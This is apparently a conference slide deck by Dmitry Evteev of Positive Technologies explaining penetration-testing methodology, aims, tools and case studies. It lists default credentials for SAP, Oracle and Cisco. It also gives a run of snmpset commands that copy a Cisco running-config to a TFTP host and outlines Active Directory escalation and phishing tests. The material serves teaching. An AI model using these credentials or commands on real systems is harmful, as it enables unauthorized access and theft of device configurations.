Penetration testing, What’s this?

Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)

Penetration testing internals Penetration testing != simulation of (un)real attacker activities Penetration testing != instrumental scanning with manual vulnerability verification Penetration testing – is a complex of activities aimed to estimate current security process status; is a testing of protection bypassing; is one of security audit methods.

Methodology On the one hand, the following best practices are used: Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … On the other hand, the following standards are used: Center of Internet Security (CIS) guides ISO 2700x series standards …

Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X

Aims High-level Internal policy ( pentest as an instrument of pressure ) Estimation of current security processes Should be done ( compliance ) Technological Get unauthorized access to internal network from the Internet Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. ) Get access to certain information resources Get access to certain data ( information )

Approaches Perimeter pentest ( with further attacks in internal network ) With or without administrator awareness Wireless network security analysis Internal pentest From average user working station From chosen network segment Certain information system component testing ( security analysis ) Black, Grey and White Box Assessment of employee awareness in information security

Real attack VS penetration testing For direct executor pentset is HACKING ! Limitations Compliance with Russian Federation legislation Limited time Minimum impact No testing like DDoS Inconveniences Coordination of actions ( it can run into a very absurd extreme !) Responsibility/Punctuality Advantages Do not need to hide the activities Simplify the network perimeter identification process A possibility to use Grey and White Box methods

Instruments Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Browser , notepad …

web application security problem The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , http://ptsecurity.ru/analytics.asp )

Pentest example: web applications What is web application pentest by BlackBox method? (real world) web server auditor working station Check 1 Check N Vulnerability is detected Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges ) Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled ) Vulnerability is detected Vulnerability 3: path traversal Impact: file reading only ( potentially LFI) Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server Next step – FURTHER ATTACK

Weak password problem The recommended password policy is used What is domain administrator password? (coincide with login)

Pentest example: Password bruteforce ( defaults ) Well known admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS mandants : 000, 001, 066, all new (RFC) SAPCPIC: ADMIN mandants :000, 001, 066, all new … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …

Pentest example: Hello, Pavlik :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6

The problem of access control Network access Network architecture ( DMZ , technological network , user segment , testing environment ) Remote network access Data access Shared resources ( password in clear text , data backup copy , different sensitive data ) Web applications , DBMS , ERP

The problem of access control Division of privileges among administrators Users with extended privileges Services (!) with more than required access level General problem of identifiers management

Pentest example: Use of vulnerabilities CANVAS && Metasploit

Pentest example: Privilege Extension in Active Directory Version 1 : Password bruteforce Version 2 : Vulnerabilities in controller domain services Version 3 : Pass-the-hash attack Version 4: Create new user from domain computer Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM ) Version 6: NTLM Relay attack Version 7: Find and restore system state domain ( for example , after successful attack on backup server ) Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS ) Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. ) Version N …

Pentest example: Security analysis Network scanning Password is bruteforced ! Exploitation of SQL Injection Command execution on server Privilege gaining Internal resources attack Internal pentest Install MaxPatrol scanner Find vulnerabilities Exploit vulnerabilities Move to network of the Head office Conduct attacks on Head office resources Get maximum privileges in the whole network !

Pentest example: Security analysis

Pentest example: Wireless networks

Pentest example: Assessment of awareness program efficiency Send provocative messages via e-mail Send provocative messages via ICQ ( and other IM) Distribute data media with provocative messages Question employees Talks ( by telephone , skype )

Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .

Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)

Conclusions Penetration testing – is a number of activities that allows to make efficient assessment of current security processes Penetration testing – is search and use of flows in security processes vulnerability management configuration management incident management security management of web applications, DBMS , ERP, wire and wireless networks, etc. etc.

Thank you for your attention ! Any questions? [email_address] http://devteev.blogspot.com/

Penetration testing, What’s this?

More Related Content

What's hot (20)

Viewers also liked (20)

Similar to Penetration testing, What’s this? (20)

More from Dmitry Evteev (20)

Recently uploaded (20)

Penetration testing, What’s this?

Editor's Notes